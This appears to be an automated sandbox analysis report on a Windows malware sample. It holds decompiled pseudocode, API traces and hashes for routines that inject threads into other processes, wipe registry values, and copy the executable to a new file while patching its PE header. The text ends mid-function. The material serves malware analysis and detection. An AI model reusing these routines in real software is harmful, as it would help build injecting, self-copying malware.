  • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 001D1BF1
  • CloseHandle.KERNEL32(00000000), ref: 001D1BF8
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: WaitForSingleObject$ReadFileResetEvent
  • String ID:
  • API String ID: 102907011-0
  • Opcode ID: 0299335ab9a3911fde22b8564450798ac63aade05c8ce35b27bba24940fd14d6
  • Instruction ID: f643c25c3e36a1ac1f5b66a08822f782b8fe4e2cd4be92b33a8443d888aa5c29
  • Opcode Fuzzy Hash: F711368702CDCBF5C032FC00282A7AE5040ABCAAF5D5DD33662A525AC07F49E106B748
  • Instruction Fuzzy Hash: f643c25c3e36a1ac1f5b66a08822f782b8fe4e2cd4be92b33a8443d888aa5c29
C-Code - Quality: 84%
			E001D17D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				long _t77;
				void* _t85;
				intOrPtr _t87;
				long _t89;
				void* _t93;
				void* _t95;
				long _t97;
				void* _t112;
				intOrPtr _t114;
				void* _t115;

				_push(0x24);
				_push(0x1d1430);
				E001D1637(__ebx, __edi, __esi);
				 *(_t115 - 0x20) =  *(_t115 - 0x20) & 0x00000000;
				_t114 =  *((intOrPtr*)(_t115 + 8));
				_t112 =  *((intOrPtr*)(_t114 + 0x1b48)) + 0x1bc8;
				 *(_t115 - 0x24) =  *(_t114 + 0x1b14);
				if(( *(_t114 + 0x1b44) & 0x00000004) != 0) {
					WaitForSingleObject( *(_t112 + 0x1b40), 0xffffffff);
				}
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				while(( *(_t112 + 0x1b44) & 0x00000001) != 0 && ( *(_t114 + 0x1b44) & 0x00000001) != 0) {
					 *(_t115 - 0x20) =  *(_t115 - 0x20) + 1;
					_t70 =  *(_t115 - 0x20);
					if(_t70 == 0) {
						 *(_t115 - 0x30) = 0xd80;
						continue;
					}
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						__eflags =  *(_t115 - 0x30) - 0xd80;
						if( *(_t115 - 0x30) > 0xd80) {
							 *(_t115 - 0x30) = 0xd80;
						}
						_t72 =  *((intOrPtr*)(_t114 + 0x1b48));
						__eflags =  *((intOrPtr*)(_t72 + 0x6c)) - 3;
						if(__eflags != 0) {
							ResetEvent( *(_t114 + 0x1b40));
							_t77 = ReadFile( *(_t115 - 0x24), _t114 + 0xd8c,  *(_t115 - 0x30), _t115 - 0x1c, _t114 + 0x1b30);
							__eflags = _t77;
							if(_t77 == 0) {
								_push( *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c));
								_push(0xa);
								E001D3644( *(_t115 - 0x24), _t115 - 0x1c, _t114 + 0x1b30);
							}
						} else {
							_push(_t115 - 0x1c);
							_push( *(_t115 - 0x30));
							_t107 = _t114 + 0xd8c;
							_push(_t114 + 0xd8c);
							_push(_t72);
							E001D1F4E(0xd80, _t112, _t114, __eflags);
						}
						__eflags =  *(_t115 - 0x1c);
						if(__eflags == 0) {
							__eflags =  *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c);
							if(__eflags != 0) {
								E001D1672( *(_t115 - 0x24));
							}
						}
						continue;
					}
					_t85 = _t71 - 1;
					if(_t85 == 0) {
						_t87 = 0xd80 -  *((intOrPtr*)(_t114 + 8));
						 *((intOrPtr*)(_t115 - 0x28)) = _t87;
						__eflags =  *(_t115 - 0x1c) - _t87;
						if( *(_t115 - 0x1c) > _t87) {
							_t107 =  *(_t115 - 0x1c) - _t87;
							__eflags =  *(_t115 - 0x1c) - _t87;
							E001D176E(_t112,  *(_t115 - 0x1c) - _t87, _t114, 0,  *(_t115 - 0x1c) - _t87);
						}
						_t89 = E001D20DA(0xd80, _t107, _t114, _t114 + 0xd8c,  *(_t115 - 0x1c));
						__eflags = _t89;
						if(_t89 == 0) {
							E001D1672( *(_t115 - 0x24));
						}
						__eflags =  *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c) - 3;
						if(__eflags != 0) {
							L22:
							 *(_t115 - 0x20) =  *(_t115 - 0x20) & 0x00000000;
						}
						continue;
					}
					_t93 = _t85 - 1;
					if(_t93 == 0) {
						WaitForSingleObject( *(_t112 + 0x1b10), 0xffffffff);
						continue;
					}
					_t95 = _t93 - 1;
					if(_t95 == 0) {
						_t97 = E001D176E(_t112, __eflags, _t112, _t112 + 0xd8c, 0xd80);
						 *(_t115 - 0x1c) = _t97;
						__eflags = _t97;
						if(__eflags != 0) {
							continue;
						}
						goto L22;
					}
					_t126 = _t95 != 1;
					if(_t95 != 1) {
						continue;
					}
					E001D2F13(_t112, 2);
					_push( *(_t115 - 0x1c));
					_push(_t112 + 0xd8c);
					_push( *((intOrPtr*)(_t112 + 0x1b48)));
					if(E001D2046(0xd80, _t114, _t126) == 0) {
						E001D1672( *(_t115 - 0x24));
					}
					E001D2F13(_t112, 1);
					goto L22;
				}
				 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
				__eflags = 0;
				return E001D173E(0);
			}
















0x001d17d0
0x001d17d2
0x001d17d7
0x001d17dc
0x001d17e0
0x001d17e9
0x001d17f5
0x001d17ff
0x001d1809
0x001d1809
0x001d180f
0x001d1818
0x001d1835
0x001d1838
0x001d183b
0x001d19a2
0x00000000
0x001d19a2
0x001d1841
0x001d1842
0x001d1905
0x001d1908
0x001d190a
0x001d190a
0x001d190d
0x001d1913
0x001d1917
0x001d1935
0x001d1953
0x001d1959
0x001d195b
0x001d1963
0x001d1966
0x001d1976
0x001d1976
0x001d1919
0x001d191c
0x001d191d
0x001d1920
0x001d1926
0x001d1927
0x001d1928
0x001d1928
0x001d197b
0x001d197f
0x001d198b
0x001d198f
0x001d1998
0x001d1998
0x001d198f
0x00000000
0x001d197f
0x001d1848
0x001d1849
0x001d18b7
0x001d18ba
0x001d18bd
0x001d18c0
0x001d18c5
0x001d18c5
0x001d18cb
0x001d18cb
0x001d18db
0x001d18e0
0x001d18e2
0x001d18e7
0x001d18e7
0x001d18f2
0x001d18f6
0x001d18fc
0x001d18fc
0x001d18fc
0x00000000
0x001d18f6
0x001d184b
0x001d184c
0x001d18aa
0x00000000
0x001d18aa
0x001d184e
0x001d184f
0x001d1890
0x001d1895
0x001d1898
0x001d189a
0x00000000
0x00000000
0x00000000
0x001d18a0
0x001d1851
0x001d1852
0x00000000
0x00000000
0x001d1857
0x001d185c
0x001d1865
0x001d1866
0x001d1873
0x001d1878
0x001d1878
0x001d1880
0x00000000
0x001d1880
0x001d19e5
0x001d19e9
0x001d19f0

APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D1809
    • Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
    • Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
    • Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C
    • Part of subcall function 001D2046: wsprintfA.USER32 ref: 001D2081
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D18AA
    • Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5
    • Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147
  • ResetEvent.KERNEL32(?), ref: 001D1935
  • ReadFile.KERNEL32(?,?,?,?,?), ref: 001D1953
    • Part of subcall function 001D3644: GetLastError.KERNEL32(?,?,001D197B,?,?,?,0000000A,00000003), ref: 001D3646
    • Part of subcall function 001D3644: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D3660
    • Part of subcall function 001D3644: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001D3671
    • Part of subcall function 001D1672: RaiseException.KERNEL32(00000003,00000000,00000001,?,001D1AB9,?,001D1A90,?,?,001D2102,?), ref: 001D167D
    • Part of subcall function 001D1F4E: lstrcpyA.KERNEL32(?,TagId), ref: 001D1FD6
    • Part of subcall function 001D1F4E: lstrcpyA.KERNEL32(?,?), ref: 001D2009
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandleCreateThreadPostThreadMessageWaitForSingleObject
  • String ID:
  • API String ID: 2693620855-0
  • Opcode ID: 6e6f1deaef2e8bfaf0bbf284ef32ef05483bd122caecc3e4ef501d8e832f1d31
  • Instruction ID: 94462b115e71142d27a6e53f557ff65113bd920af959ff06e8194a60a9f9cb68
  • Opcode Fuzzy Hash: BBF0A947480D4AF7D81B5931141CBBB7448B7CA3C18DCA65C30416752EAEDF325E9A5F
  • Instruction Fuzzy Hash: 94462b115e71142d27a6e53f557ff65113bd920af959ff06e8194a60a9f9cb68
C-Code - Quality: 97%
			E001D1466(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t11;
				void* _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				intOrPtr* _t25;
				void* _t27;
				char* _t32;
				intOrPtr* _t33;
				intOrPtr* _t39;
				void* _t45;
				intOrPtr _t46;
				intOrPtr _t47;

				_t45 =  *0x1d5000; // 0x0
				if(_t45 == 0) {
					L5:
					__eflags =  *0x1d5078; // 0x0
					if(__eflags != 0) {
						L11:
						_t12 = 0;
						L14:
						L15:
						return _t12;
					}
					E001D37B7(_t11, 0x1d508c,  *0x1d5074);
					__eflags =  *0x1d50c4; // 0x1
					if(__eflags == 0) {
						_t20 = E001D37D0(0x28, 0,  &_v8);
						_t33 =  *0x1d5074; // 0x0
						asm("sbb ecx, ecx");
						__eflags =  ~( *_t33 -  *((intOrPtr*)(_t20 + 2))) + 2;
						if( ~( *_t33 -  *((intOrPtr*)(_t20 + 2))) + 2 != 0) {
							 *0x1d50bc = 0;
						}
					}
					__eflags =  *0x1d50bc; // 0x0
					if(__eflags != 0) {
						L13:
						 *0x1d5080 = 0x1d508c;
						_t12 = CreateThread(0, 0, E001D36F3, 0, 0, 0x1d5088);
						 *0x1d5000 = _t12;
						goto L14;
					} else {
						 *0x1d5084 =  *0x1d5084 + 1;
						_t14 =  *0x1d5084; // 0x0
						__eflags = _t14 - _a4;
						if(_t14 < _a4) {
							_t16 = E001D37D0(0x28, 0,  &_v8);
							_t32 =  *0x1d5074; // 0x0
							 *_t32 =  *((intOrPtr*)(_t16 + 2));
							E001D37B7( *((intOrPtr*)(_t16 + 2)), 0x1d508c,  *0x1d5074);
							 *0x1d50c4 = 1;
							 *0x1d50bc = 1;
							goto L13;
						}
						goto L11;
					}
				}
				PostThreadMessageA( *0x1d5088, 0x12, 0, 0);
				WaitForSingleObject( *0x1d5000, 0x7530);
				CloseHandle( *0x1d5000);
				 *0x1d5000 = 0;
				_t25 = E001D37D0(0x1e, 0,  &_v8);
				_t46 =  *0x1d5049; // 0x0
				_t11 =  *_t25;
				if(_t46 != 0) {
					L3:
					if((_t11 & 0x00000004) == 0) {
						goto L5;
					}
					_t27 = E001D37D0(0x28, 0,  &_v8);
					_t39 =  *0x1d5074; // 0x0
					 *((char*)(_t27 + 2)) =  *_t39 - 1;
					_t12 = 0;
					goto L15;
				}
				_t47 =  *0x1d50bc; // 0x0
				if(_t47 == 0) {
					goto L5;
				}
				goto L3;
			}

















0x001d146d
0x001d1473
0x001d14ea
0x001d14ea
0x001d14f1
0x001d1549
0x001d1549
0x001d159d
0x001d159e
0x001d15a0
0x001d15a0
0x001d14ff
0x001d1504
0x001d150a
0x001d1513
0x001d1518
0x001d1525
0x001d1528
0x001d1529
0x001d152b
0x001d152b
0x001d1529
0x001d1531
0x001d1537
0x001d157e
0x001d158c
0x001d1592
0x001d1598
0x00000000
0x001d1539
0x001d1539
0x001d153f
0x001d1544
0x001d1547
0x001d1554
0x001d155c
0x001d1562
0x001d156b
0x001d1570
0x001d1577
0x00000000
0x001d1577
0x00000000
0x001d1547
0x001d1537
0x001d147f
0x001d1490
0x001d149c
0x001d14a9
0x001d14af
0x001d14b4
0x001d14ba
0x001d14bc
0x001d14c6
0x001d14c8
0x00000000
0x00000000
0x001d14d1
0x001d14d6
0x001d14e0
0x001d14e3
0x00000000
0x001d14e3
0x001d14be
0x001d14c4
0x00000000
0x00000000
0x00000000

APIs
  • PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
  • WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
  • CloseHandle.KERNEL32 ref: 001D149C
  • CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: lstrcpy
  • String ID: ($TagId
  • API String ID: 3722407311-2515966560
  • Opcode ID: dbc64af6430ca1c5886ade0b967d05941ebfb9057e984414971c4070ddfe475d
  • Instruction ID: fa5cba4715d104d4c09d20bb5c144b14be78e5e3a72b22bd9689641a04f682e3
  • Opcode Fuzzy Hash: FCF05C45404DB79BC52710821517B2E20D2AF46B8EC4233726635F6ECC0DD17008BF0D
  • Instruction Fuzzy Hash: fa5cba4715d104d4c09d20bb5c144b14be78e5e3a72b22bd9689641a04f682e3
C-Code - Quality: 59%
			E001D1F4E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t52;
				signed int _t57;
				signed int _t61;
				intOrPtr _t63;
				void* _t64;

				_push(0x44);
				_push(0x1d1390);
				E001D1637(__ebx, __edi, __esi);
				_t63 =  *((intOrPtr*)(_t64 + 8));
				_t61 = 0;
				_t57 = 0;
				 *(_t64 - 4) = 0;
				while(1) {
					_push(0);
					_push(0);
					_push(_t64 - 0x20);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t64 - 0x20)) == 0) {
						break;
					}
					_t52 =  *((intOrPtr*)(_t64 + 0x10)) - _t61;
					 *((intOrPtr*)(_t64 - 0x24)) = _t52;
					if(_t52 >  *((intOrPtr*)(_t64 - 0x20))) {
						_t52 =  *((intOrPtr*)(_t64 - 0x20));
						 *((intOrPtr*)(_t64 - 0x24)) = _t52;
					}
					_push(_t64 - 0x1c);
					_push(_t52);
					_push( *((intOrPtr*)(_t64 + 0xc)) + _t61);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t64 - 0x1c)) != 0) {
						_t61 = _t61 +  *((intOrPtr*)(_t64 - 0x1c));
						 *(_t64 - 0x28) = _t61;
						continue;
					}
					break;
				}
				 *( *(_t64 + 0x14)) = _t61;
				if(_t61 != 0) {
					lstrcpyA(_t64 - 0x54, "TagId");
					 *((intOrPtr*)(_t64 - 0x1c)) = 0x28;
					_push(0);
					_push(_t64 - 0x1c);
					_push(_t64 - 0x54);
					_push(0xffff);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c88))() != 0) {
						lstrcpyA(_t63 + 0x3cb0, _t64 - 0x54);
					}
					_t57 = E001D1603( *((intOrPtr*)(_t64 + 0xc)), _t61);
					 *(_t64 - 0x2c) = _t57;
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				if(_t57 == 0) {
					 *(_t63 + 0x5c) =  *(_t63 + 0x5c) & 0x000000fb;
					 *( *(_t64 + 0x14)) =  *( *(_t64 + 0x14)) & _t57;
				}
				return E001D173E(_t57);
			}








0x001d1f4e
0x001d1f50
0x001d1f55
0x001d1f5a
0x001d1f5d
0x001d1f5f
0x001d1f61
0x001d1f64
0x001d1f64
0x001d1f66
0x001d1f6b
0x001d1f6c
0x001d1f7a
0x00000000
0x00000000
0x001d1f85
0x001d1f87
0x001d1f8d
0x001d1f8f
0x001d1f92
0x001d1f92
0x001d1f98
0x001d1f99
0x001d1f9f
0x001d1fa0
0x001d1fae
0x001d1fb6
0x001d1fb9
0x00000000
0x001d1fb9
0x00000000
0x001d1fae
0x001d1fc1
0x001d1fc5
0x001d1fd6
0x001d1fd8
0x001d1fdf
0x001d1fe4
0x001d1fe8
0x001d1fe9
0x001d1fee
0x001d1ffc
0x001d2009
0x001d2009
0x001d2014
0x001d2016
0x001d2016
0x001d2019
0x001d2031
0x001d2033
0x001d203a
0x001d203a
0x001d2043

APIs
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 3
  • API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 3598368018-0
  • Opcode ID: 02c1a043345bfcf4915c21911e954b3d5073dba7e642fc22e378a39fa225183a
  • Instruction ID: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
  • Opcode Fuzzy Hash: 3BD0A900CE2DC9B876631047996CB73E2009F121CA98C378A32D90CB088B2E3038E341
  • Instruction Fuzzy Hash: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
C-Code - Quality: 33%
			E001D3020(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				int _t13;
				DWORD* _t18;
				intOrPtr _t22;

				_t18 = _a20;
				_t22 = _a16;
				_v12 = 0;
				_v8 = _t22;
				 *_t18 = 0;
				_t13 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t13;
				if(_t13 != 0) {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t22 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t18);
						}
					} else {
						 *_t18 = 1;
					}
					_t13 = CloseHandle(_v12);
				}
				return _t13;
			}








0x001d3026
0x001d302b
0x001d3035
0x001d303b
0x001d3043
0x001d3045
0x001d304d
0x001d3050
0x001d3055
0x001d3061
0x001d3066
0x001d3067
0x001d3068
0x001d306e
0x001d306a
0x001d306a
0x001d306a
0x001d3078
0x001d307e
0x001d307e
0x001d3057
0x001d3057
0x001d3057
0x001d3087
0x001d3087
0x001d3091

APIs
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
  • GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
  • CloseHandle.KERNEL32(?), ref: 001D3087
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: RegCloseKeyRegDeleteValueRegEnumValueRegOpenKeyEx
  • String ID:
  • API String ID: 2802766549-0
  • Opcode ID: e8b56a8720ee6e3ece2d4dc4a7345ea2c28f84232851412fee7266dde94396d7
  • Instruction ID: bfb9062b6176546c74d883c13d9a210422831c3169cc6c7731f438f327b3575d
  • Opcode Fuzzy Hash: 15D0A982DC09873A2B430048AA3D7E8E072FA502C08ACA3F234800AE568F4F3008CF52
  • Instruction Fuzzy Hash: bfb9062b6176546c74d883c13d9a210422831c3169cc6c7731f438f327b3575d
C-Code - Quality: 100%
			E001D35DB() {
				void* _v8;
				int _v12;
				char _v44;
				long _t10;
				int _t18;

				_t10 = RegOpenKeyExA(0x80000002,  *0x1d5004, 0, 0xf003f,  &_v8);
				if(_t10 == 0) {
					_t18 = 0x20;
					while(1) {
						_v12 = _t18;
						if(RegEnumValueA(_v8, 0,  &_v44,  &_v12, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v8,  &_v44);
					}
					return RegCloseKey(_v8);
				}
				return _t10;
			}








0x001d35f9
0x001d3601
0x001d360d
0x001d361d
0x001d362d
0x001d3634
0x00000000
0x00000000
0x001d3617
0x001d3617
0x00000000
0x001d3640
0x001d3643

APIs
  • RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
  • RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
  • RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandleLocalFreeTerminateThreadWaitForSingleObject
  • String ID:
  • API String ID: 1487171737-0
  • Opcode ID: 113accf1a247a85ca4628c88750f0cdfece1ea245e894959ebf4d1c2d30c192f
  • Instruction ID: 41ff6f16ac9ee2ff72b6e11d6e7bca6878d0baa93780668c194bfac74e4ec8cf
  • Opcode Fuzzy Hash: 3ED0228D802F0BD0CC5B5047AF2E3320106AB40BDAE1C89703290414816F1FE067EF8D
  • Instruction Fuzzy Hash: 41ff6f16ac9ee2ff72b6e11d6e7bca6878d0baa93780668c194bfac74e4ec8cf
C-Code - Quality: 100%
			E001D1ABC(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					if(_a8 != 0) {
						E001D1E27(_t14, 0x7fffffff);
					}
					E001D1DD4(_t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}






0x001d1abd
0x001d1ac3
0x001d1aca
0x001d1ad2
0x001d1ad2
0x001d1ad8
0x001d1add
0x001d1ae5
0x001d1af8
0x001d1b02
0x001d1b02
0x001d1b0e
0x001d1b0e
0x00000000
0x001d1b15
0x001d1b1c

APIs
  • WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
  • TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
  • CloseHandle.KERNEL32(?), ref: 001D1B0E
  • LocalFree.KERNEL32(?,?), ref: 001D1B15
    • Part of subcall function 001D1E27: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D1E4D
    • Part of subcall function 001D1E27: TranslateMessage.USER32(?), ref: 001D1E74
    • Part of subcall function 001D1E27: DispatchMessageA.USER32(?), ref: 001D1E7E
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

General

Root Process Name:P8Wo4avJbj.exe
Process MD5:F391556D9F89499FA8EE757CB3472710
Total matches:84
Initial Analysis Report:Open
Initial sample Analysis ID:57817
Initial sample SHA 256:060448FFD71FE2EDBB5FE7C6298AD2B077E57FA6ED6D4250FBD799DD85488843
Initial sample name:x2f5mqUHU.exe

Similar Executed Functions

Similarity
  • Total matches: 6
  • API ID: lstrcpy$CloseHandleCopyFileCreateFileGetModuleFileNameSetFilePointerWriteFilelstrcmpilstrlen
  • String ID: dll$exe
  • API String ID: 1827060118-2048111982
  • Opcode ID: c3885fe13371a926e81591ffe00ebdc536067f9240e3e9512f9da992c1313499
  • Instruction ID: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0
  • Opcode Fuzzy Hash: 52F0E98E0D8E83C5D466A3477C95BF311417742D9AD4D97B079D97298F6F12A208EF04
  • Instruction Fuzzy Hash: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0
C-Code - Quality: 100%
			E00402B08(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t20;
				int _t23;
				int _t24;
				struct HINSTANCE__* _t27;
				void _t30;
				CHAR* _t36;
				long _t42;
				CHAR* _t44;
				void* _t46;

				_t20 = GetModuleFileNameA( *0x405044,  &_v268, 0x104);
				if(_t20 == 0) {
					return _t20;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t44 = _a4;
				lstrcpyA(_t44,  &_v268);
				_t23 = lstrlenA(_t44);
				_t9 = _t44 - 3; // -3
				_t36 = _t23 + _t9;
				_t24 = lstrcmpiA(_t36, _v8); // executed
				if(_t24 != 0) {
					lstrcpyA(_t36, _v8);
					_t24 = CopyFileA( &_v268, _t44, 0); // executed
					if(_t24 != 0) {
						_t24 = CreateFileA(_t44, 0xc0000000, 3, 0, 3, 0, 0); // executed
						_t46 = _t24;
						if(_t46 != 0xffffffff) {
							_t27 =  *0x405044; // 0x400000
							_t12 = _t27 + 0x3c; // 0xa8
							_t42 =  *_t12 + _t27 - _t27 + 0x16;
							_a4 = _t42;
							if(_a8 != 0) {
								_t30 = 0;
							} else {
								_t30 = 0x2000;
							}
							_a8 = _t30;
							SetFilePointer(_t46, _t42, 0, 0); // executed
							WriteFile(_t46,  &_a8, 2,  &_a4, 0); // executed
							_t24 = CloseHandle(_t46);
						}
					}
				}
				return _t24;
			}














0x00402b23
0x00402b2b
0x00402c02
0x00402c02
0x00402b35
0x00402b3c
0x00402b3e
0x00402b3e
0x00402b4e
0x00402b59
0x00402b5c
0x00402b65
0x00402b65
0x00402b6a
0x00402b72
0x00402b7c
0x00402b89
0x00402b91
0x00402ba0
0x00402ba6
0x00402bab
0x00402bad
0x00402bb2
0x00402bbb
0x00402bc3
0x00402bca
0x00402bd3
0x00402bcc
0x00402bcc
0x00402bcc
0x00402bdc
0x00402bdf
0x00402bf1
0x00402bf8
0x00402bf8
0x00402bab
0x00402b91
0x00000000

APIs
  • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00402B23
  • lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 00402B59
  • lstrlenA.KERNEL32(?), ref: 00402B5C
  • lstrcmpi.KERNEL32(-00000003,004011C8), ref: 00402B6A
  • lstrcpyA.KERNEL32(-00000003,004011C8), ref: 00402B7C
  • CopyFileA.KERNEL32(?,?,00000000), ref: 00402B89
  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00402BA0
  • SetFilePointer.KERNELBASE(00000000,00000092,00000000,00000000), ref: 00402BDF
  • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 00402BF1
  • CloseHandle.KERNEL32(00000000), ref: 00402BF8
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandle$WaitForSingleObject$CreateEventCreateThreadExitProcessGetStdHandleGetVersionSetStdHandle
  • String ID:
  • API String ID: 4158509741-0
  • Opcode ID: 2ad7749c4b6b29532a42bdd3babab8e75ff4bd89d39d064bb05a7080b22e26a8
  • Instruction ID: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8
  • Opcode Fuzzy Hash: 1FF02D8822485981C46BAD007CF4FB125448B1765FD98B7143F6D7816F3785B1457F9A
  • Instruction Fuzzy Hash: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8
C-Code - Quality: 96%
			E00403358() {
				long _v4;
				void* _v8;
				long _t8;
				void* _t10;
				void* _t11;
				void* _t17;
				intOrPtr _t23;
				intOrPtr _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t36;
				intOrPtr _t42;

				_t8 = GetVersion();
				_t42 =  *0x4050b0; // 0x0
				 *0x405070 = _t8;
				if(_t42 == 0 && _t8 < 0) {
					 *0x40506c =  *0x40506c | 0xffffffff;
				}
				_push(_t31);
				_v8 = GetStdHandle(0xfffffff4);
				_t10 = E00402A43(); // executed
				_t36 = _t10;
				if(_t36 == 0) {
					L10:
					_t11 =  *0x40506c; // 0x0
					__eflags = _t11;
					if(_t11 != 0) {
